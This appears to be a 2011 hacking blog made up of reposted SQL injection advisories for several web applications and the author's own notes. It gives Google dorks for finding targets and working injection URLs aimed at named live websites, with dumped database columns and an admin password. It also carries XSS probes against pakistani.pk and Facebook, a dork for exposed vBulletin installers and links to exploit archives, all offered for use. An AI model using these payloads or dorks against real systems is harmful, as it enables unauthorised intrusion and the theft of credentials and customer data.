http://www.mohackz.com/
this guy has some real sh!t going
Sunday, May 29, 2011
A lot of useful software for hacking
All his software was coded by him
http://reiluke.i.ph/
Go to this site; he has a lot of nice software and tools. Don't leech.
All in One Tools & Tutorials
http://www.hackforums.net/archive/index.php/thread-1141587-1.html
Go to the link and learn to hack by watching and doing it yourself.
Saturday, May 28, 2011
Q8Portals SQL Injection Vulnerability
=========================================================================
Q8portals [asp] SQL Injection Vulnerability
=========================================================================
[+] Title: Q8portals [asp] SQL Injection Vulnerability
[+] Author: Net.Edit0r
[+] Tested on: Win Xp Sp 2/3
[~] Data: 2011-05-13
-------------------------------------------------------------------------
[~] Founded by Net.Edit0r
[~] Team: Black Hat Group
[~] Contact: Black.hat.tm@Gmail.Com
[~] Home: http://Black-HG.Org & http://Security-War.Com
[~] Vendor: http://www.Q8portals.com
[~] Category:: [webapps]
==========ExPl0iT3d by Net.Edit0r==========
[+] DORK: intext:Powered by: q8portals.com
[+] Description: You start using the command having 1 = 1 - name of first table to find And more using the command (order by )other name you will find tables
[ I ]. SQL Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[+++] Important: For Sql Injection easily program such Havij and use Hmei7
[P0C]: http://127.0.0.1/portal/articles_en.asp?id= [ SQL INJECTION]
[P0C]: http://127.0.0.1/portal/contents_en.asp?id=4 [ SQL INJECTION]
[L!v3 D3m0's]:
http://www.alowaidhoney.com/portal/articles_en.asp?id=-4%20group+by+ARTICLES.ARTICLE_ID,ARTICLES.ARTICLE_TITLE_AR,ARTICLES.ARTICLE_DESC_AR+having%201=1--
http://alghanimkw.com/portal/contents_en.asp?id=4%20group+by+CONTENTS.CONTENT_ID,CONTENTS.CONTENT_NAME_AR,CONTENTS.CONTENT_DESC_AR--
[+] TIME TABLE:
12 May 2011 - Vulnerability discovered.
13 May 2011 - Advisory released.
=========================================================================
[!] Black Hat Group ./Iranian HackerZ
[!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net
[!] Greetz To : DarkCoder | p3nt3st3r | Amir-MaGiC | 3H34N | H3x | D3adlY & All Iranian HackerZ
[!] Spec Th4nks: HUrr!c4nE | Virangar | B3hz4d | M4Hd1 | Mr.Xhat | Immortal Boy | __SENATOR__ | And All My Friendz
[!] Persian Gulf 4 Ever $CENSORD$
=========================================================================
Trade Line Web SQLi Vulnerability
Trade Line Web <= Remote 'id' Funcs SQL-i Vulnerabilities
>> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
I'm KnocKout member from Inj3ct0r Team
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
Special greetz to : and Endonesian Backtrack Team - 0nto.me|09exploit.com
My inj3ct0r Brothers.:) r0073r (~) Sid3^effectS (~) r4dc0re (~) Indoushka (~) eXeSoul (~) eidelweiss (~) SeeMe (~) XroGuE (~) agix (~) KedAns-Dz (~) gunslinger_ (~) Sn!pEr.S!Te (~) ZoRLu (~) anT!-Tr0J4n
--------------------------------------------------------
Note:' i Need botnet Owner friend! '
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Trade Line Web
|~Price : N/A
|~Version : N/A
|~Software: http://www.tradelineweb.com/
|~Vulnerability Style : SQL INJECTION
|~Vulnerability Dir : /
|~Google Keyword : "Trade Line Web" inurl:detay.php
|[~]Date : "19.05.2011"
|[~]Tested on : DEMOS
----------------------------------------------------------
urunler.php <= 'ID' Functions Not Security
detay.php <= 'ID' Functions Not Security
---------------------------------------------------------
Example| Exploitation
SQL Injecting..
Target : http://www.chickenstrade.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x7573657273&tur=urun
Mysql Writes: id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan
Hm... ok.
SQL Injecting..
Target : http://www.parkdijital.com/urunler.php?kat_id=8%20and%201=1%20union%20select%201,group_concat%28id,0x3a,username,0x3a,password%29,3,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1
Mysql Writes: 1:admin:12345
Hmm... ok.
SQL Injecting..
Target : http://www.kececigroup.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,@@version,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1&tur=urun
Mysql Writes : 5.0.90
================================================================
Was Here. HTTP://H4X0RESEC.BLOGSOT.COM
Web Design by ChromeMedia Exploit
>> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
I'm kalashinkov3 member from Inj3ct0r Team
#########################################################
# Title : ChromeMedia SQL Injection Vulnerability
# Author: Kalashinkov3
# Vendor: [www.chromemedia.com]
# Email : kalashinkov3[at]Hotmail[dot].Fr
# Date : 22/05/2011
# Google Dork : intext:"Web Design by ChromeMedia Inc" inurl:*.php?
# Category : PHP [SQli]
#########################################################
*_Exploit_*
# http://[localhost]/*/*/article.php?content_id='22
# http://[localhost]/*/*/article.php?content_id=[SQLI]
# http://[localhost]/*/*/details.php?product_id='20
# http://[localhost]/*/*/details.php?product_id=[SQLI]
# all php files "*.php?*_id= " are vulnerable
# ^_^ G00d LUCK ALL :=)
=========================================================================
# Greets To : BrOx-dz & all Algerians Hacker'S ;) & All mmembre 1337Day #
=========================================================================
Friday, May 27, 2011
frame-oshop Sqli vuln
product: frame-oshop
vendor: http://www.sdaxx.de/
date: 15.05.2011
status: 0day
version: i dunno...
PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12
Dork: "2006 by Sdaxx Rostock" intitle:"frame-oshop"
Note: -sessid had to be fresh
-there are more vuln...
>>published by -SmoG- on SceneGround.info<<
gretz to my mentor Therion, c0x and other sg-members!
SQL Injection MySchool Version 7.02
##################################################
# Google Dork: "MySchool Version 7.02"
# Date: 05-21-2011
# Software Link: http://em.com.eg/
# Version: Version 7.02
# Author: az7rb
# Tested on : winxp sp3 Ar end bt5
# Homepage : www.p0c.cc
# Greetz : p0c Team & Dr.NaNo & All My Msn Messenger Friends
##################################################
#################### wWw.p0c.cc #####################
##################################################
# SQL :
#
http://localhost/myschool/index.php?do=show_details&ID=[sql]
# Example :
#
http://localhost/myschool/index.php?do=show_details&ID=29'
# SQL 2 :
#
http://localhost/myschool/show_page.php?Page_ID=[sql]
# Example :
#
http://localhost/myschool/show_page.php?Page_ID=&table=users'
# Link Control Panel :
http://localhost/myschool/login.php
##################################################
HB Ecommerce SQL Injection [Exploit0Db]
-------------[ HB ECOMMERCE SQL Injection Vulnerability ]---------------
------------------------------------------------------------------------
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
[+] Google Dork: intext:'supplied by hb ecommerce'
[+] Date: 26.05.2011
[+] Author: takeshix
[+] Author Contact: takeshix@safe-mail.net
[+] Software Link: http://www.hbecommerce.co.uk/
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
[+] System: PHP
------------------------------------------------------------------------
vulnerable url:
/templates1/view_product.php?product=
Example:
http://localhost/templates1/view_product.php?product=[SQL INJECTION]
Get an Mail from the Customers Table:
note: customer passwords dumped in plaintext!
------------------------------------------------------------------------
Greez to: esc0bar | Someone | takedown
------------------------------------------------------------------------
--------------------------[ hacktivistas ]------------------------------
vBulletin Installation Untreated
inurl:/install/install.php intitle:vBulletin * Install System
Search this dork at www.google.com.
This dork finds vulnerable vBulletin installations on some servers.
have fun finding servers ;).
Sunday, May 22, 2011
Here's a nice milw0rm backup by me at co.cc
Milworm, here's the link, and find all the exploits that you need ;)
Sunday, May 8, 2011
How to Install BackTrack full guide
OK, for starters, this 'guide' will help you know what to do.
Make a live CD or USB (make sure your computer supports it, or use the CD).
NOTE: If you're using a netbook, it's possible that it has USB support.
So, when it boots, select your options; you will then get a full-screen terminal. Wait until the prompt comes up: it will show root and a blinking underscore. OK, here's the part where people start to get confused. They will say "WTF, it's not BackTrack, it must be a fake". IT'S NOT. Type startx and the GUI will come up.
Hopes to everyone.
Monday, May 2, 2011
Getting Metasploit for my ubuntu
Why I tell you this is because I can post my own exploits & vulnerabilities quicker than just searching & posting updates, though I do have my own list; later on I will do so.
pakistani.pk XSS vuln
http://pakistani.pk/?s=%22%3E%3Cscript%3Ealert%28%22Hini%20Aes,%20owned%20here%22%29%3C/script%3E
Official Pakistani site has an XSS vulnerability.
Facebook XML Vulnerability & maybe XSS
Vulnerable Link :
http://www.facebook.com/search/opensearch_typeahead.php?format=xml&q={blablablablabla%20what%20is%20this?%20xss%20or%20xmls?%20:))))}
Here are some more links you should analyse:
http://www.facebook.com/crossdomain.xml
http://vthumb.ak.fbcdn.net/vthumb-ak-sf2p/v10827/119/63/591250483/t591250483_10150090747365484_1395.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/NcdgX3e2GbI.css
http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hJvRUZ2EOeM.js
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
Sunday, May 1, 2011
Join me in facebook | macrocrack group
http://www.facebook.com/profile.php?id=100002121514878
Join Macrocrack Soft.
| Osama Bin Laden is now dead |
----------------------------------------------------
I will be posting facebook vulns later on, may take me some time to find so....
Is facebook vulnerable in web applications
Yes, Facebook is very vulnerable to a 'Med' level attack. So far, I'm going to scan again because I just got a new OS installed (Ubuntu Netbook Edition).
Rootbook the best facebook hacking utility in hacking.
Rootbook the best win32/ubuntu32 (Python-Based) facebook hacking application on the internet.
Release Beta0 will be out soon.